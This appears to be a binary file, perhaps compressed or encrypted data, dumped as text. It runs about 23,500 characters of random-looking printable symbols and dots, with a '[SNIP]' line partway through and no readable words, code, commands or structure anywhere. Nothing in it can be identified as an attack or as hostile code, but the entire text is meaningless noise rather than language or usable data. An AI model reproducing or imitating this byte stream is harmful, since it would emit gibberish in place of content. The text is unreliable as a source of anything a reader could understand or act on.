`.S..    ..,C....vylv.w3*"./.....[..3.Y:.....VC.c ..iD$SR.+c...d..X...-.nS....c.f..%....@..Pm\..p~\.=..........I....$..|(..:....U..<:.T..t..m:.....C)_.Yh..}-.*..C?...$c.mz...>..^.u.2.t...[."..((F...3Z..k.Z=z.6G?...*9._.O.y...&..P....?.pS".y8.....ZE.......{...h.E...KrY......`@.\...n......#-...)........p.L....m^.b|]...X._.r...I.o...S...} ...S.|I.......C...;......j..M.c.....q..1.W....^...8...-'t>.,3|....U.f........Rc.+...y.#.R'.r.... .%..^..1.....5.....f.l..`...;....i.....%Q..vS[..O.(Y..k*.....zQ...^..>'s.p.2...M..b..|.$.,..O..;D|......}l0.t...G.K...d.P...WD1..5.H.{.p.'...y._-c..7v8..:.*..b.X.0..a.f.B..\i...79....V....k...Y..l...|..ajm4............uoVM.....^f....o6....:..`3..qp..dS...z\..J.e..k..!....8..m}K.. .h.y..e..E%..g.k......,.g...(.x..\....MC......../j
.B...:v.....S.+..?..t.....Y..cP...,7v.6c..z.....F...d..{d..?..3.ws..:f..>.g...-.T.A..T\5.    p.!t...[DJ.Z....L.a.*<.:......4....z._r}.j........"....R.}..."N...0.V..wh.......o=:.Z....$.s./8.aTx.....Q.....F.....w..%Q.........J2....wl.$o...].y..W..R.`......    ...o.-.].v..!t...._..(    .G_5=?2.........S.!q.@......3f._..2.h(:-p.+.T%..K.....C.Q.x{.>..z..o...\..].NU.. ..PM}.8l.O....g..A.    ..-f.5/.Yt!...m..\_:....KRy.|........$.....^.../...,.|.....b.7j9>\$&.........&...`....I.N..J.....;s..n.$^.hIk7.M.J.:/...q.......`.#..{...{....9.....-.......b...-.X.
...EK.D.....LOvI.h....W..M#.n..c...\.5s.....R-........n.....-si.)w.....'...R..^).Y.Y..V...... .T.)
.xt{...?...`...I].<es/@..._$..8..7.&.K;..\...t;"..\...../y.v:..).\.......9.Q....L..~...X..!.V,_.4...[O.)..5.A.cQ.'_.3.....}'...5^W[V].    ...:.z.i.w.+...#.I]....T/.............+7.v.Gl......G&.!..:.!<....S..b_.#-...m/..Z...$..(..r....U.>...p.\.........9........`..W... ..Yg.....J..?.3.[3!v..g...$...S......#.+l.}....7.=v..V9.......Q)wUZh..4......gr..*>....Y...;...
...iA{..p*.V.f...........FG..p.......'..3......Tc.d..n.TR..~a..*!.2.z.Y7..&.yJ.p.4..rR............ ..e..$x........3I\.2..-D.P6Y..B[....E(q...N..9..A.6....{'..f.T.A..r.N..|]...j..l    .dZ...OQb..]6..FI.<..;5j..y.3l .Y../'........1..XZ!K.1.....2g@..Ht@...t...f.y4........lG:..Y.?..&3..!..w0....&U............$2*&....t...'..P!....ox...........O...|..%Z....dk9..}<.0.M..;.vM}.y...R..Gq.V.....r.]..g{.....    f..f.5...............BIh..I.......~Q.IN3.0.;0....c~..@0o.....y.    ;RH....)cs.+.
{K......!s..5....EK......;.U.C\....j..@..B/Hw'G..H..........w..9.......?..F-.....9W......SH............Yz.y......+k..|........
sa&u..#,....zM..[^..l..".t.....t.BP....gG.8b.......PgOg1...NT=.AE....`.~.,f..i.{:....f{W..5h7.+...1J@.^.].|..+g'...B"......<..,y..0.7A.:.wr..-.V...e..~ePf .f...D..:D.}h.I0.JQ.]
...;....../...Aq.I.$.6.....u.Cy.._f....OVMp....Z_6..:...L..8..=..{.E.d...7FH~)...4....M.r..........$H.3j.[.&N...t...].V.e.e...c....m    Tq.u....Hh..V.x..p..LA...E.    rL    .....6.W......<...J.JU.rr8...i."..9....x.,......D....89..g4=.L....A..u7..\..[.[IX`X.`.i....3....GI..(.1...y."V./>[O....*..k.......V.t..........K./...;Z.,..y..4..n.I....G.?....m,./.UO.(.|..A^..._........)5.o.|..#M...._i?.1K1....+..fzm.dFp..........,b..d...u.?..... ..ET...h....,. .i+....,.K.1c.({B.Ma..~...
.lO...{......=<..].|......X.6.6$...|...6v......:Jw..ve.j.I5..e2.D.........O...4.b
2...#d*.(..2.xJ..1.'.[.J.0?x.m...........V.-R.N....aZ.e.c@{.4.
.....ZJ5..'a.;.=.#B..D....\..R".w....{..|.....E..ZA..U).|Z..y6......($...D%...^.......g...|.....j...J...3 v.t"_#....L..k.....;..........=Mq.[..-..<>...T.[....&*...

.b......ma.X.k.8.R.M..dX....h@.^%....*....i2[...r:.<m..s...D...............G..j~.Wrf0..~.&>.0/D....z!:l`$.....Q.;lH..7).a_......k.c....X....
....;.S...p....Jp~.~..3....zg...O..b..S.8^.R._.a.`.j x..)..k.ZzhI.U+L...-b.HF.........B..Q;A...K.Bo.A%.j.?..b.qd.b.$..Xr.......9...|..B.+....Y......^t.:.-.b..u6D..k..x...&}.Hl..Q..>.?o7.d[....... 0. ..'..M......R..w...`B.bo..]0..$..4...u.-@+..7..xe.(...._"8..x}T.).a.6....G3?IC......4../_...]*.A.......O.....'......;.....XA.q.......OP...;..S&.h.....    9A8{...0F.A...c--.w.....I......je.E.V.    >.$8..b&.39....5Xp.uo....Os..3..c.n<..c...\.JN.........r.x.x......*w....#..........Cs...r.o.T..*.!M..... G9....*...h..xi....6..k.X:T.....cJu`q.|({\.Y.....G....d.L7.p.J...V...}WJf.v[>.<...A-.....->...<l...?.4lQ.<B.G.n..T4o........sa.0..?.2..v..s.......[sgL...?.sW,...;)...4".Z.t.y.q.b.j.2`...J...*_d.h.HW....a....)-.VL.    .....m.."...".....L.....9q.....1.@.Q..S.I...g:7.8....N..z|..y..0*S..Q.C9.&.i.6j..<.....\ir. .Q..\..g8...g<.|j.....y.&E!..Z-....F.....jk..hi.1+F..s.(.........
..<7W&......i.i..{...qE..<!g...=.O<.....O........L..."cf.-....;..RA.u.3....Q..>.....vo....| ..A...... ...)>....s...6Xs.(..o.4MUN .........9.......1X.&CY0}...E....~.X..........`..S.....~..5..P.....u|.".In.,....`.}"Z .... h[..j.    D......#..B..&.<..WL..H...IL<...8.........f.)..~.....Sa......T.C8b...,.V..x.V,..........8..../..1...v....6..,x    1.EB...u......"..w5._.m.RH.j..|...#m.7..[..u..c!........<.....    ..L..[.kEL'.{.........9)..j..d....R^+.R(...H...bg.[.u...h...r5+.....O[.d=....5..b...@VO..@.!..<-......d.V..../N.e.t.....v..KjUq....q.......1.>.c..A.. .W.wA/....]B..k..~
-.    ...T."< .+[\...D.=..`...`....<.3.......&.....][....6'..7...8.n.i*...c...!u..GZ.....j....1.....,.    n.e....0..Ny..P8G..W.....P........=.}
..3...........{D..%H.......z.4..'...B^.S...s.2E....<....D..wr.......><.1[t.MV..7........oc.14.    .W0;+JXEx..UxP.......&..R$..m+w.7....w.....? ....:)..$....;`.e9./\2.z..;.aXYq.N.....@".|x.Q..\.RS$y.8?aA.]@F.../6........Q...*.....q(.Ty.P.IXvB.....!.2s .
.........QAW...P)(%..z...I.....8..
   .j..V..v.K..8.w.8    ...N....cyj..T1..l...QJ:.V>.........kc..!w......8..o..q.......i.Q..do.H.[.m.....T.,7:.v..\..*.&.cC....2..!uY3.......8.`.....R...Kj...So.\JwT.......~..3.."...BK.E.Zb.kJ.c.0~.>.._fK{.b...F!.Z..Pr..R...:j..uj.(.q+.....&...j[........`1....K..K...v...(2...4....f{....h.%..Ue:.Z.........f......$..."}......a...`7%.....V...........U..X....+...jw,eI.$k....F..ti.#?.i...?H?p..b....    .:Eg....4.;..fJ....b.$.....n.CQ..Z.A.Z..iO...8.H..S....`yY..R[.h".D.A..g(..*.G;....."..w.M>(:....z.Z.....M.6.../....a..    |.....T.....5....(....M..v.H[..(ar..,p).[..s....g..?...K......\.e!gM.Zn-.I.$~..!...`..k.3l    Uv.7.9...0....L....( ...6.....(.%....v.[1.j..._.....=.@ *.....<.|_J..}.}.*.\o.Fr.Q...E.......G...UJ...2.`u....'R...    ...klM=....v.#.H...3.u........F....Xh...fd..y[w.gk3...K..    ...K.......u.0...V....-..$g.].8X..]....}\s_.YCH..x].n..cL......T..r!.....3..h._.    .{.....L.8c.+...+.R...+.6...:;............B'qG..a.q......%.......W.-........z......_.`<!>4.L....... ..s.....t.y!..U..    .i......q.AC.....2.g1.o.......:.r6.....y].z..
......9&4.u.i=......n.6..;.......".F$K..[.W......R$N....v/b....'T.^}<..!.Q.30\.......s..e.^....c.s.v.g...p...... ..T.Z ....[..*./Q.....R..7(.Z..n.....E......3..e<I.[...~.....J..tv9....on.|..    ..~f-....>.C../.....RMH.-. oZ...
.....V0.$W..
.....@\_w.a........[&..m2..~..2....<...Xl.y.z....e......O..-<#..M.4....?(....<.....I.R..E..o.....A.'.....|F.........hPV'2..=....<vL..D...{....M{..*.VM^...y.*.....?...q..v....r..G....TK..[..,.2&?......L"K<...^.B"A(.8....J.*!..t-.g.k.........A.6P.
.....,..nX`...4...%JG...g..Oj..Z......F.....CJ.....4U..P.. ...x.gB...bW..)W,..i8....E.O....MG.fI..QR.j.,JY.v..
......gJo.Y.z...$.o..A8..d..M.&m..K.qL....+..].c..5..L..:.iR...'..9..H.d.j....+CX.}..........p1..k..7vt....\\O.w.{..EB.,....!.].;N-.....
.XJ........1...C'.*&.'g$0b.V.m.-C.3..2l....6..U.L.....`........3^......~..../.u...?F...p...!..Y...d..:N.*.z}..+.....z}?/...C%mWv!,..\.I)..-......`.K.g...b4.....3.........0../z.u~.2W...&^&..-.`...d.....%c..
..q.E.......Y\....Q.....).0.n..n*.....!............H..Z.'..+..r..F.wn#d..'..>...*......!]TY....vn.oKZX........x*.    ..w..e......(......f    R.7..c......G.R.6....L...k...(.A(nU..7...^.
..I..}<.}...<.pd...9....N..X...Na    ..LUB..G.K..i-..r......r......7.WP..9....h.?Dn[d...I+....GL4l]<.0.........V`y.b7|..3....2#UB.o.F..b4y......+.....g......V7.....y..8..Q....A..^79M.g..u.c...o."Z..&..e.|T.......>,...8#.p+..=*..>...........5....F..$...z....z<9P.$.<......c...mM.LJP ... .u..4....p.v.H.+eTV.VG....B.....    I6....]..JC......c...=...].C...eIN.YX......    h.2.....%...IhA..jsS.F.~V...J....6..YL............!.(.......roz..V.}..K..wb..G....leX.xB..c...=*g&.*.....t%&..9.j.<...ug..0.W.%p.#.;.....t.;.}58.t....|Y............9]j`:w.x.
.g...dF].3......w.x...C.Z.....9(.6..Y..._w.84H..1....xNd..../..T...p:...a.................|*...~
}.=.*.a..-.!.2..eqQG....+?`......nM+.U.....=uD.. 7*G.e.....X=i.z...S4f........y5k...Q/....4{."$Ko...,g&N5.j^..... .%|.e...j... .2...7_Gmo.r. &..........Z.../..0..:..N..Q..2...1.J..k..*.....v..=....T;.e~.....    .O..M...`4.g.......&.E..5.-..N@.
..6`l......\r..{.._..C....R.9.....
....!....}..m'....W.@..x~y.v.@$...';.Y.F..Ms..h8w$j...6.k.g<6.......C.W..t.@i#".......W.....C.-.`<Qvgy..q#..p.......N..[.r../.Ct5...w6....4?.;.    ....M..c...0P.Lt...9....G..s.,...m!..........f5....>.......s..Z..1...
._.`..v....o.6J:R.kx.1..........?....<.Ri.U.(./z.. $~eW=T.B...0..Y.Yb..S.....V>..G.H....Is.........d...Q..@...%....\w...BojU..U# N....>V.#fq>8R&Xq.........h.....f....].n..T(.....z?u...2.+X1.N...o........1.P)f..8.J.....UX.0.bEv...b..    ...J.Jyd,J@.....g.$$.?.dAQ..W..o!n.G..L.h.Q2.m.Vg....l<...O......I.E..Yt.'AT.<......B._c..s.........g...E...6.@8`.`.n.d.%.&......Np.A.(..'.9..w.Co......1(P(.......?..y..@......^N.V6........p.....u].....k).A..N..44.*.^.u..{g:...B    ....p......YK.....ob.Ja7..t.KI#w...D#.....uI.9....I`W?k...
t.h.!....*..F....J6:.....&...x1l.o,....C:Z....m......U.Cf...U....2.D)@...........,...N+..P..=.~.......S.%."vVA..(8.....t...QA."Q.w.. ....eA=s.
bw...>...O".I.5j...t...]S.
O$.....x.d5....
..j....@......J..H.^7......R..hN.<...~.8.K9....3.D*t..^. .....?..?=]..De.e[....: 7.I....o.(d.[.B.lPSpX.E.g+Y....I(T...^..6.......C..{zW..p.7..%&F........C.l..e...U..m:.....E....Q...N.!..\T:..|......q....M...3....Z. .....D.ar..W....b.&.`.(....z.}.m..8.|Q.5KT..1ys.....?._.......I.    o+.......?..j.........S`...8#t..dk94..z)..........}.i8.....2-.E....T......4.s.;.......J.o,.}N....f..l...[..t.._....    .E.~...2...    .o[...~...P.HL...d...o.....D..>.....q.].....K.....\.1......M..8..y.........5]..97...J.n......-. .= ..^.L"..<.8..........t.gF)W:.cG'a.+.G.:...5.Gx.,S..F.+..~.....K...9Y...tw...H.H..t.#..;.IA.....W*./8.......iG..t..8...*&5g..L.0.>.S......ns..m..F........wG.N. g..SH.....O..'V+......6*a.[.|!.........DJVwl.Zc.|...............V.E'U.i....p.9...u..x..Vq    ..@...c~<........I............D_.W..Y.......t.".|.@V*......`d5L+.....Dr..3.V.c.C..|bt_.{...Y.......}..V.6...=........Y.9...JO...h5..Q.....d)..'...$...G..?hv=......7....l.......G..VA.....~cQ..{..D...<N.z.rh....7.l.e.fP......e...@...?..j.i(...    .Y...Lpy.^.........;H..W..>p...@.s\.X.r......;.~....|.........y..p..k..'s...a..+v...G.I+....'P(f.~
..6.....u.uOoR...=.w..i\...`<@..Q.yl..c.k.....R...,.,V5.d.#..yr..|4.C....p`Ay....(]..............@zO......q`..N
.'..p......@U....    .K..{...s,u..%-...X.z.G..A.P....0..8x....)......wbD;...i./<I....nq..9Gt8....5..7...(*.....L...!!..<.VU.V^.....M....mE......<].a.......Q...9.3.E.n.FTS$.Zj..{.vQo...C=......`...De.^/qZK.....}.`.(..3.q.w.tC...(T...X.....@.....)IL>.X...L.#;.lR...~..0'^^.....>Mk......Dy+.20...|~2P/..B.JQ.H.$3BCi...m.:..Y..&...x.....d/[........%GE.7..#.8..[......v..6h...3.>J[O..F.!.;.1.!.lm|..2|3..t5........hV...'.."......w    L....g-.V.ng....A5..g.....P:3 ...JSu. ...0.+....J.>.g=X.6U..1.-....}.Y{:.X......Y.N...Uk.....).....?...~)......e^INl9.5..M_Y..*.E9...)w...V....|eb9(.0o..l..DG.cF.cW.
.....wif.}..I.L.\54.R.e.^...;..s.ae>B|.....T.O.....>G....N...5......%(....
.....k...K.b=.{Q......6.....VR.....<.C....L.R|..kr.Uk.yj.....c..'zZY..|..;.j5.nt..r.y....9...@...,..[`QNxI*.....ra.....'...._..``...o.........8../{........N)YE$...HQ....k:2...E.....5*..Q..Z.`.L...].=^N. .a...Lz2.....g..e...j0..;..b.{. .g.fI.....]..,..#.bZ
!....."L.4*.....g.......8.6.9..I....qT..JH...O......i..7..M..9......T...:.'BeBq...s.[..:._..KD.;....'|*z....,.3.I..dG.i.p..1t.n.....1._.y...|.
F.Hw..<8.~..m{..`jw.
.....L.Pb.?`o...F}.V.....PB..o)....)|.WdR+Y.....T.C!..G..=..0...0.K...7.6..|....U`.co...1b.....Y.<....g@=..d...........7!.h....#.k.7.WrX8..z...#.,...BR....SK..L..".3.......a._....=..\..1=0....7..1]}H..;zr.0.V
Y.6[-..WjP.I>}..^...j\]X...,...Cm....n@...p.hR/#*-^.:..t.v..}....].......5n@.......H....b.G\C.>.C./xC:..G....h.w:.5 .HD .......5..Ov..[........;.}k.$!.6(...A\j..9UP...]..[+    .@..H...]..0.K1..,..T..2d.?.......Q....}.t\.O.V.........{D]..\&.s...)t....(.*'..4.n..S.~.Y.kQ.go.f*R....|>.wM.0...Tw.y.    ....W...L.....u.Z.E.y-.a..V......ra.....].3....&.Y.8..bQ.....5;..K..._...Ib...=$C.b.})r/i...1I6...:V..=.....E7{..0{.9U...a.r.!Pt9.....~.p....A..%.~g.....iz......W ^)y..O_...g.?...V.$7F..7...-.;..c...nu..>.H.t.......S...{..........u.'.3...S...Y.2.........b.d.>5..V
'.Y.v......
.........BL...Q...1].....F.!.}.d...+...<...A.U.......@......^&*A...>.........b..h....<=9...!.;.e{~.....v.{?.ex..v.....l....u;.bKpI........u..!(.r..ubN...fu`...R....*.... ........^.%..o...s.0.....i22.....2.........M%..\$,V...P..\K....%I.p.~*]...~b.t......$q......#.w.+....e..@....d.j...S....8h.    ..?R...+K8....c....T........<.fwU..}k.?S..h....g.v.5`.O...h.E.`........'.....n,....*.>.....c'......SwQq..K.....t...|....9U...0...    .B..w.C..(.gv.K..:.Yu..@h...............0S..u.!    l.Wg..s......f$v...i&.I..X.L.e...W..B.....5....cR6..?C...;.{E-.r..%J.J..b...by....{..2..a.+..v[V.....8......Fv.rDlT...+F.L.T.S.....-....s..<}z1D....qn.A'.J8Y...|.Q..P.`.....7.T..8..X....07...md....f....5.#...3..F.#......~....MO..z&.]...........:..X..zMl,..._. ...L.D..N....K0..-a...us..f.l.,....P..7[.g.....Jx.:...-Qt...........R5)...~.t.i:....p...$.}._x...qs.G.x.r.,/....W.O)...4..igvC..0./.....c.~C1..#{J=..Z-@.....E....V.9&...^..M.{.P:. .>=.. o..b..}D........a....*.!...=...)2c.U+..-.!........-.<..n]...n..<......j9*&.6......._..{.*r...F."*ai.5.J..Y    'Ys.I............[C.oK......@.215S....*g>h.3...%24..
.2.H.0G......M:;f...J.}....<.W.!n^......h6n"X...V.!7.vi.f......F.:...z........b........../..Z."r\.....B.{.......>....s...H.B.sv.l.;......U`..,..} ..B!.1."G`x.....1....B......D.{.nF(.....AK..pRZB....J...?*u4,Sl.m&-.....E.P`.[...B..W.......~p.y....j.zW>.7......Tx..tF..qt.}bg%......,'..=1...k].s.H..3M..1.\....@.....*....00G.....8...f.t.@.s...n].<..yG.....[..e....%UA..l......?.u..>................w..4....'........o=8.=...;>......q+..._[..6j.8I..P..S.R..0,g.3....;..U#.V4j...9....ku......(.K.i.G......p.&....q...D...&.f..
...b.1..B...Z.. ....3.N5,..d..8;b#
....p .....C#DmI.J,l4G.l..W.IW.{.......O..1.`........+[...*....4...T}(..4.l.p...;.k.y$....q.T..R..j...lbuX....K.3@..Q:i..9..f............#.U...8.p..=.....6.....@y...._.[)+..Q.O;.4.%..w....3L....EN'..(."?3.......yHi.6....^o..x.G.:.....917...@7".i!.clo.......W......e+$j...].).6...\.R...#.........MM(...<YgY......plB..S.Y...}..$4.i* .^.}F?R.n.s.,I.S../.g.1...+j.S...f.0..M;.%.`.U..(...3.(.....u.".z...XG.u|7...;.Z.g).....G..5.<....=...$.....N.n.*..)..b.t.)~....G..".gT.NH.;..I.*.>o...`.F1.+.pA.....Q."....MM.......D.].5d.c..#M..l.RDtV]...s...Y.{...9cX..C.1*.g..X.!.C.%..P....6    ..*
E....(|....Q..|NfB)6.I_............]......K.!...?.....N.5..pLI{C.-...)`......s
n..3P....(..dR.k+.zG..>X...F....:..&...].?.....M...V.U*...2.2..N....)a.`4.B....m.".Z%.SQ..w......,[....7uR.    .;..p...g'PN....b..T...Oh.yw.;.i...D.!.}.J|......*..NCi -.C..zC..\.....m...5.L....'b`J..OO...9p..x..Y~$:..\.7@.......t.o.MD..+..D?.GG...i.Q.|.F........=b......L.=.s..ff3....p.H!..".M.{..7z=Bx..e..:..D.d'.........a.9@62_3+-.u.(.3|..5p..x.g.C3I.}..B*...H...A.#!..a.#..:.a[....~M.d....bO.["Eh...._ .=......':LT3......f?..A....p5L5s.Z....#.\.\S.O.z.I..=-..>T....0:@..*....
d....;...9]..2`...Y'.....j.&E...2..XVp~D......r..Te......a^.MI.N."...r..FM...".W....m.....)c.kT.8..).n.....G71r~...U.^..w..p...n...._I2.%<.....q...^6g..J.....2.I...x..2..sW......Q..m.@..`).X..4*.7....s...`'.U...Dh^..1..G..B...{.'.....
......w.Z....qe.\^.....p}.[..cO\E....jm.B..`>..W.+h7.......q..+.`.1.?9.[]'..{.A
y_...4..N...+..m-.....Te/......p........Y$.N...n+..........A.
D|6X....`./.Cg....H.O..M;v...1D..6|kF.L.SI..
>.a.xPf.....Y.hR..!........w...!....U.....`..'....]..I.=7R....k6...Z.....x9....sD3....v;U..8#.....p@...A....'8...]k=2... .......n.......3.[.9.b..........    ....PG.^E....=N...g.:.....&.......    V!.HXJQ.."......_....(..A.p.^..3.......~."N.1]n.R.bu..{.........#..../..)H...~;O.K...);.#.w../.0.,....W.z".&.-9.. ........&A}..u....y.]:..|Yl.Tf._.b|.....A-.    .....Ee.-@."]u......@.uS..=p.X.&.G.e"1.OI..'<-e..)om..U.....Y.^.p..O.....%D    ...`...6...A..E    .L <l...A....+*...'+%_....!.q.    .........J.......s.;...X.,...z.W.y.V......._..2...K.A.r.j......X....$E...".gi8+^lef.......=.&.V\..A...Iy.ZD.S
qV........z,H..2.... ._....aK.............+...O..Cd......    j...........o..j.u.Km\.?r...p...$h0..i......>)*.<v..G&.C.3.LR...T0....p...R.z...R....v.P..5.})......../..
8...D.CB..._uc..&/.F.q......%.*.k.....2... ......KU4`..y.1H&y...fe_zQ.eq..Nxn..[....6.."...Pg..v.....4(.    .gb.....;.pRu........8.    @...7..$|2y..O.b_    .g......Y.eC....!?...    ..:.{Wu.Q....OK
.(..+9oSF..'F......].bn..%]...5....x)v..=..........(.Y+.{
.......w@......N.".3..z,....9.....P.......3.M1...<..7B|...! .:.$K...|...N.`r...|G.....@]dcC.~.h/Z...W..66..s.Uz...CL...Z!/<.........{..B+vt."V.D.......>.... ..{/..n.........<|./.k....5.(.E&w..O].G.W..q.3...i5.$.y...x....X...Ckgl..+......T....8........O3.X.}._.l..G.....D.n..J$~...u..C.....c..h
U2........{.`..j2D..p[F...h]F.h.y.........06......;..L..h..Q..F...6.0..........i3...    .O.(.>Q.8.X.?j.
%N....._........0.s..J.....`C3.....ez..D..I.=,.@..=...._.]0a......s.......c............"I.q~(.y..u.;.FN}.t...ga;..........]....|nn..W.."O&..U.4...vT..P..3..U.....g.8..Z.W-./.zL:0.."..+..A<......X....>....K..e..N.|.a...3...Jc..().X.!D.............{.,;..~......(..O....c.k...V....9....t..P.[...c.W...A....[..GGk...+...n..........!"..&..j3;..G.v.b..O..0.v...Y...."....U..........0.70]P..q....Kg.!..Q.._XD..3g.4.}.+/h..`A..+...+.{.F...)<-....R..?.2<.?~q.....*..D...<G F3...~..O..1...\J/H..2"...`\..E4m..s._I.`g.n....@.m.Y.$..h.....9)7.E:.KO....7T........J..
..8...t...F.:.d.XZ....U!..    .kC..0(y.%DB..]...E .    .
..Q...=.M.    #..]........K.........m"...3..L.....E.r..    o../..;4..}.....scSjE.......v...k\09u.*V........{..A.og .z...R............;7(l.).....J%$..v..QZ.g'.....hA..6z..!4.Z.....n.BB.._.[..OU8.h<.v.|..At...l..34...vG..(.@.r....9..o....NG.....D ^k......Af...Q......SE....N..ZE$.c.Y.w..).ZM.X.f@c...^...w.E...r.}.9<!.Yct.............H..K...u.o..;..Y.exEx..{.V.r.....i.....?.....h.O....6.w.c7.
.....t=..J..A..);C....n....I.~.2.....de..e)..J.'w... UR.Q...n..\m1..?.l.&...hP.\fA........}.9ke5wL?..v....C......5.....v._{S.d..,.Y..
.....`A.....{&..$7.4:r.18...;&..D....kwnrr...]L.....8a..........r..e#...$....K.?.3.E.....zcd[_.n...........m...B.qmjf..t|-.a.*..[........a.k65.e....qb.c.....t.F.I;...K].6v....Rh.........NWFx..#QB./;..&..H.#V...un.2...t^....a*.W
.Q....z.d.O.R/M..6.....=\r'..:Ff|.g...i.r.....d..:/kTw..q$%...@.t...)..h.!e
.7.._~.....!.X....}.Y..h.+.....dF.g.C
.......3n    .=...iB......XO&.....|..H.:$@j....U.#. ....3.p.+..h...|.N.iE$G..V...@.,..>R.v..B...eC..hl./.ts........".;......lq..N0.Zn~.@`#..|J.5..........s.p/..j....e:..D._$.9...J.L.5........WN..\...Y.rcvP....|..#]C..O...
.HuU1..WY....2j. ....s.;~,.N(.ER..|
u......Y.D'....... ...X.....R"K.........:*[c.w.
.Ye.HeB....5...e.^hQ...;...%'a.G...=O...kH=x..xil.....W....8.......y..E..J)l....P..Y..b....Ku..}.@...2`48j..p..-.......J.sEA+.^..4.."..........3l...Q.A.....(...._U..|R.IKw.#(G.M....i.T:..9Y...UCB..H.......Y.n.^....$.6E..m|3...]....`...3.W..V.H}o......lna...)V...o...+..d'.p.Se..o +\....[).Fa..[q^@).q%.U..t.J..9r.z'.v'....cSrN.9..^...fN...Y8.L..%-.P......F.!u..@.0..M...<W...jF.AU.SSY.{z.....................7y...9 ...7.....=.#u"j}...x..^.l.'.&.J.z.N..(._...=LE@)...B.!......,...$...yU...D...Q.....e....T.TF!9..({2\&.kb.[E$.J...d..J...k`.\os*~....D%.y.".....E.-?.Xd.......=.(q..........a.o.....Q......a.=.BA.].._..v..t.`x.u.(.}Dt..T....    ...0:!K.........2$N..s^0\.../..'[..(.\.).l..@....2....^.o.....ap... ....3.Y@<.&..    Y./w@[........e.i...O..7(.....y...\0.......V@.!.hT.......2.lL.U.....eLo...X......=S..V.8..gud..!]&w.UD...\.,.7../..A..1..<].s.M......D.4    .B}...,`....U.e~..w..B.7.D...o.E5....D..-.....$.M.U...%X=..R..S.@.^.4...]6.Q..[`c..k.....P.......H./...x..-R... W............,^...V-=.v....^.89..;..N
u.]..}`...v...:Fd,gL.G..m..3.f|..nc.B.HC...Kc.8l...-...d.r.k.`u...J;@. .($.=e ..Ir.8..y....5..T...(.|M.Ge..j.f...^+...g....y../_.=..lZ....>^...n..l..V....J.....p..Cx)d.c~;ta.....U..R.X.<n..}0.,.b...P.....8.F...Q>.n..Pz.i..&
.......6..*.{W..>g...0...o6(....|.Y...V%...7\.2....~...9[.h.....#....`.@op.....b....y,..t'.c.[D.i{O.bL..2...^.v4..C6Q}x..VI....yx.J..l.'.l..b2_.....;@. ...9w.&V..._7...c..'e{...2.K(.0A.6....~....E-......._".4.I..#\?.DjH.K..............X~}.1b<^.*+"....7...-...Z.T-V...............m...d.......\}.}.A....]..O\zN..7..wX...7...>...9....E..9f....
.....m.,?........B..#...B...t...F....t.#.Qu[....&......HV..B....E.Z........tK..Q.......l.-.Bx.    G9.0!.El....hMf....../..c..02..<......B....tFmQ....c+........ .....$.s5"6......Ia...J,..^o.k.a.    ......I.dtV.........Qeu........eu\...m...m...1...|.t...g@.O!........"...6....I.....Rv.|.v..=..p.).....$E.:)..N..F.7..8H.x ......;H&.....Xv......?...[.R......1..y.(.r.....v...G.PQ...a.AA.>$.8.9M.?b|,lN..9.Ic..jh.s.........-._.....a..d.8R..4.%`....MJ..f.......H&|........    .P....@<.....#..j...'F)....N..i..M]....`.Q..$.?Q.i......?..[.xDMz...N..Du........L....R.Q....    .....0z.83n~......1B.D.M....T....A..,.-MM...g.k....?Y......i....r.." ..:.29......I.<..?H.( ..&.A...\.6..    ....|.4.{E......|.P,..1...r..d...Mh(%.{."^.+..g..E.!?.F.c......#.?.C..i.;.......................@.v*nl.C...J-....M;BfR_.dQ........Z.d).I........Y2....#.R...[+-O/....?..J2..;.....:..C.1.    ..7r..8vaU..iv....T\.............O.7A8D.t.._.ADl...g..v.~Q....lR..(.b...PF:...b....:..V_.(...w>...\B@y.g7.t....^7.{.
...........=?Du..xF/...j........^..n..h...m|-....|....L.cz.d#.l..?.T. .U`8U._..}..4.&M.pU.'.4...8....
a..~..un#$=....z......N..!9..r~....J.......<........n-dZ.Jm.}M...`.}..w.#'t_.E*..R.5......D...n1;.S...._&.......k.}Y<.[3..1.....p......A..U..9!A...@e#R...............Qk.f.<..........<.^e1PX.;"?.=D|1<S..B..i.eP..~|Y....`....[1...S..9......EP.j.#8.......da......    ...............A.....i.....~..|&..W....ON,A.....c.>:.Q.N....@W@R....V.~..W/p.....c....~V..e|.9........42...p.x..S..cA].......HD...7/.....5.I..Y...N......B.X;:.........3.!+z.#G.F.-.. ....Q.E...`C..6..|...P.R/..._...U....i8^R........Kr]4....C.Q...!....?a.
P...Q.j(..L.v.$&.0~>..cI..a.oj.....r.> ...D..rQ?..z..<.b...."J.Z..oXVO.#4+..z..b..m...>...VV......**.N.p.=`1......'D..K.TEx5(..$S.l...).2..J.3<I7.B.v.q...L.S.......I.    ....\A.8..a...r.....O..MO..k.bm.533a!1.)k.XV.V.n...Sf.Cl~s.2@....F......j.LN15..`....K...u....#...*.q `...f..0..8..\R..R.>.9.b....O.W.......D.i.............h...g..:{/.. `.B...of.2..:n....+....8....K[.l..)K.&7.n.N..{......m.P..(..Y.9.H}.d...@.+.7....S.ox2t.i..?..]:..fo...w...Nd.aH..o#r.ld...o.+..j...\....;..}..r....I..TL#,........P..3n.....06.F..s[.M..?.7..BA.J...w]&.R.}.....A.z...#.._2.._    .jL7M.....TA.....?T,..n...R...H..&e..5%>.
..._y.L@.`.2....A
.."..A.L...>
...[SNIP]...
....B.9....M..o{..../...J.....L............f..u.V.+..(..a.G..G...:,O.i.|S.|....!..i    $......K....E.......[..d'.....cTAp.p.2.m[Nv}...z...(y..B.G..    .....f.J..C........)Z.........../(.`......e.o.R..5k..{<?.m)....
..D]J....9..%Y.ZJ[....6........I..nm'..$..?).v.z.aT..1e._......"...S]E.o.K..7.....q.......L.+....(mT.QF...<b...    ._....~.`...[..G.... ".G.......*7....
'L.j...&.fq._.X...hA+Hgt.T......:.m.s..R..+5.y..k..F.*..u.Bn.U..Tv.j..cp.'. ..T.."{!t>. ...O..U...[......#..$.).w...F....7.%.*........p........^b._..........?._....v..^.i..w.......`t..-.</X...$zu.]..(KBe%Hl...OU...N_"....'~jGbd......;...4.._d..4s...I..../B...4/...7...5.....n9..iZ\.....;^...(.K.]..#.s...F..B.((X.{.Y.W..3]...k..8.s...k...
.....2.f?9....n..42.. ..B.\J.p...;.d...Nz.g.."!.=s.)...eF.c.4..<...FVM....R....,P
